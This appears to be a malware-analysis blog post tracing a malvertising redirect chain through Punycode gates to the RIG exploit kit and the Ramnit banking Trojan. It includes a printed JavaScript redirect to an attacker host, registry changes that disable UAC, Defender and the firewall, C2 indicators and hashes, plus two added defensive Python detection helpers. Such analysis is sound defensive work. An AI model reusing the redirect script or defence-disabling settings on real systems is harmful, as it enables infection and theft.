Last week I decided to play around with some sketchy sites and, not surprisingly, I found myself getting infected with malware. Let’s go over the redirection chain and then I’ll go into brief detail about the malware infection.
After browsing on the sketchy site, we see some traffic to buzzadnetworks.com:
Alexa shows that buzzadnetworks.com is ranked 326 globally.
The request returns a 302 Moved Temporarily, pointing to a new location at xn--b1aanbnczd5ie1bf.xn--p1ai. Punycode is being used to encode the internationalized domain name (IDN). This decodes to языковязыков.рф (using a Cyrillic country code top-level domain).
The HTTP GET request for /redirect.php?acsc=93042904 returned the following:
The time zone information, referer, etc., is POSTed back to the server:
The server responds with the following:
$("body").remove();$("html").append("body").html("
");window.location.href = "hxxp://turself-josented[.]com/voluum/?acsc=93042904"
This causes an HTTP GET request for the resource located at turself-josented.com. The server responds with the following:
The meta refresh redirects to a resource at redirect.turself-josented[.]com. The server responds to this GET request with the location of the Seamless gate:
The threat actors behind the Seamless campaign have been using Punycode for the location of the gates for over a month now; in our example it was xn--b1aanbboc3ad8jee4bff.xn--p1ai. This decodes to языковязыковязы.рф. The meta refresh redirects to the gate and the server responds with an iframe to RIG EK:
I'm not sure why they switched from using IP-literal hostnames to Punycode. Here is some additional information on Punycode being used by bad guys.
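As an added example (not code from the original post), here is a small Python helper that pulls hostnames out of proxy-log URLs, decodes any xn-- labels and reports which Unicode script the decoded name uses, so IDN gates like the two in this chain stand out in a log review. The log lines are constructed from the chain above; the URL pattern and log layout are assumptions.

```python
import codecs
import re
import unicodedata
from urllib.parse import urlsplit

# Constructed proxy-log lines modelled on the redirect chain above (not a real capture).
SAMPLE_LOG = """\
GET http://www.buzzadnetworks.com/jump/next.php 302 Location: http://xn--b1aanbnczd5ie1bf.xn--p1ai/redirect.php?acsc=93042904
POST http://xn--b1aanbnczd5ie1bf.xn--p1ai/redirect.php 200
GET http://turself-josented.com/voluum/?acsc=93042904 200
GET http://xn--b1aanbboc3ad8jee4bff.xn--p1ai/gav4.php 200
GET http://www.example.com/index.html 200
"""

URL_RE = re.compile(r"https?://\S+")

def decode_idn(host):
    """Decode every xn-- label of a hostname; plain labels and malformed ones pass through."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            try:
                labels.append(codecs.decode(label[4:].encode("ascii"), "punycode"))
            except (UnicodeError, ValueError):
                labels.append(label)  # not valid Punycode: keep the raw label
        else:
            labels.append(label)
    return ".".join(labels)

def scripts_in(text):
    """Script names (first word of each character's Unicode name) for non-ASCII characters."""
    return sorted({unicodedata.name(ch, "UNKNOWN").split()[0] for ch in text if ord(ch) > 127})

def find_idn_hosts(log_text):
    """Map each xn-- host found in any URL of the log to (decoded name, scripts seen)."""
    hits = {}
    for url in URL_RE.findall(log_text):
        host = urlsplit(url).hostname or ""
        if "xn--" in host and host not in hits:
            decoded = decode_idn(host)
            hits[host] = (decoded, scripts_in(decoded))
    return hits

if __name__ == "__main__":
    for host, (decoded, scripts) in find_idn_hosts(SAMPLE_LOG).items():
        print(f"{host} -> {decoded} [{', '.join(scripts)}]")
```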
Not surprisingly, the Seamless campaign is still using RIG EK to deliver the Ramnit banking Trojan. Oftentimes I find that it also downloads AZORult.
File System
The Ramnit payload was downloaded to %Temp% and then detonated:
Process bilo22.exe modified the registry by setting the following:
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\jfghdug_ooetvtgk = TRUE
- Persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UfyQwfyv = %AppData%\mykemfpi\ufyqwfyv.exe
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = 0
- HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = 1
- HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify = 1
- HKLM\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify = 1
- HKLM\SOFTWARE\Microsoft\Security Center\FirewallOverride = 1
- HKLM\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify = 1
- HKLM\SOFTWARE\Microsoft\Security Center\UacDisableNotify = 1
- HKLM\System\CurrentControlSet\services\wscsvc\Start = 4
- HKLM\System\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = 0
- HKLM\System\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = 0
- HKLM\System\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = 1
- HKLM\System\CurrentControlSet\services\MpsSvc\Start = 4
- HKLM\System\CurrentControlSet\services\WinDefend\Start = 4
- HKLM\System\CurrentControlSet\services\wuauserv\Start = 4
- Persistence: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = C:\Windows\system32\userinit.exe,,C:\Users\\AppData\Local\mykemfpi\ufyqwfyv.exe
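As an added example, not code from the original post, here is a Python audit that applies the checks these modifications suggest (UAC turned off, Security Center notifications suppressed, security services set to Start = 4, a second Userinit entry, Run entries pointing into the user profile) to a constructed "path = value" snapshot of the values listed above. The snapshot format and the placeholder `<user>` (standing in for the elided username) are assumptions; on a live Windows host the same checks could be fed from winreg.

```python
import re

# Constructed "path = value" snapshot of the values listed above (not a real registry export).
SAMPLE_SNAPSHOT = r"""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = 0
HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify = 1
HKLM\SOFTWARE\Microsoft\Security Center\FirewallOverride = 1
HKLM\System\CurrentControlSet\services\wscsvc\Start = 4
HKLM\System\CurrentControlSet\services\WinDefend\Start = 4
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = C:\Windows\system32\userinit.exe,,C:\Users\<user>\AppData\Local\mykemfpi\ufyqwfyv.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UfyQwfyv = %AppData%\mykemfpi\ufyqwfyv.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = C:\Program Files\Vendor\updater.exe
"""

# Services the sample disables (Start = 4): Security Center, firewall, Defender, Windows Update.
SEC_SERVICES = {"wscsvc", "mpssvc", "windefend", "wuauserv"}
PROFILE_DIR = re.compile(r"%(local)?appdata%|\\appdata\\", re.I)

def parse_snapshot(text):
    """Turn 'path = value' lines into a dict; the first ' = ' separates path from value."""
    values = {}
    for line in text.splitlines():
        if " = " in line:
            path, value = line.split(" = ", 1)
            values[path.strip()] = value.strip()
    return values

def audit(values):
    """Return (finding, path) pairs for values matching the tampering seen in this sample."""
    findings = []
    for path, value in values.items():
        p = path.lower()
        name = p.rsplit("\\", 1)[-1]
        if p.endswith("\\policies\\system\\enablelua") and value == "0":
            findings.append(("UAC disabled", path))
        elif "\\security center\\" in p and name.endswith(("disablenotify", "override")) and value == "1":
            findings.append(("Security Center alert suppressed", path))
        elif name == "start" and value == "4" and p.split("\\")[-2] in SEC_SERVICES:
            findings.append(("security service disabled", path))
        elif p.endswith("\\winlogon\\userinit"):
            # The default is a single userinit.exe entry; anything appended runs at every logon.
            extra = [e for e in value.split(",") if e.strip() and not e.lower().endswith("\\userinit.exe")]
            if extra:
                findings.append(("Userinit hijacked: " + ";".join(extra), path))
        elif "\\currentversion\\run\\" in p and PROFILE_DIR.search(value):
            findings.append(("Run entry launches from user profile", path))
    return findings

if __name__ == "__main__":
    for finding, path in audit(parse_snapshot(SAMPLE_SNAPSHOT)):
        print(f"{finding}: {path}")
```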
Process bilo22.exe creates the following files:
- Copies itself to %LocalAppData%\mykemfpi\ufyqwfyv.exe
- Persistence: %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\ufyqwfyv.exe
After rebooting:
- svchost.exe creates a .log file in %ProgramData%
- svchost.exe creates numerous .log files in %LocalAppData%
- HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 0
- HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 1
- tracert.exe sets registry key "HKCU\Software\AppDataLow\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\Client"
Network Traffic
- 104.197.122.221 – www[.]buzzadnetworks[.]com – GET /jump/next.php
- 31.31.196.183 – xn--b1aanbnczd5ie1bf.xn--p1ai – GET and POST /redirect.php
- 52.8.118.144 – turself-josented.com – GET /voluum/
- 52.8.118.144 – redirect.turself-josented.com – GET /redirect
- 31.31.196.182 – xn--b1aanbboc3ad8jee4bff.xn--p1ai – GET /gav4.php – Seamless gate
- 5.188.60.18 – RIG EK IP-literal hostname
- DNS queries for google.com followed by HTTP requests (non-malicious)
- TCP traffic to 194.87.236.35 port 443 – awogqfbalyisqceqla.com
- TCP traffic to 87.106.190.153 port 443 – bmgjcjssu.com
Additional details on C2 traffic:
==================================================
Remote Address : 194.87.236.35
Remote Host Name : unspecified.mtw.ru
Remote Port : 443
Process ID : 3716
Process Name : svchost.exe
Process Path : C:\Windows\system32\svchost.exe
==================================================
==================================================
Remote Address : 87.106.190.153
Remote Port : 443
Process ID : 3716
Process Name : svchost.exe
Process Path : C:\Windows\system32\svchost.exe
==================================================
Image of HTTP requests and DNS queries:
Hashes
SHA256: cc80f45b6c770ea59d8584526cc2a2b2574f78ab87b739a360750d5e470207d2
File name: RigEK landing page.txt
SHA256: 8e13de0f5fc422d6098ef03bc040e650c1cde89f8541f8acf3617ff122b64185
File name: RigEK Flash exploit.swf
SHA256: 1aa23536dc6ed14b0a49a2438ba9e9e3332bf467789c55dd2adc3b97bea236d4
File name: o32.tmp
SHA256: b77167bf6101fc2fc07ac50fa977ffff567b44daeb216a52c1a8c66d79a421d2
File name: bilo22.exe
HA Report
Downloads
Password is "infected"
References
- https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf
- https://www.cert.pl/news/single/ramnit-doglebna-analiza/ (original source)
- https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/ (English version)
Article Link: https://malwarebreakdown.com/2018/01/16/rig-exploit-kit-delivers-ramnit-banking-trojan-via-seamless-malvertising-campaign/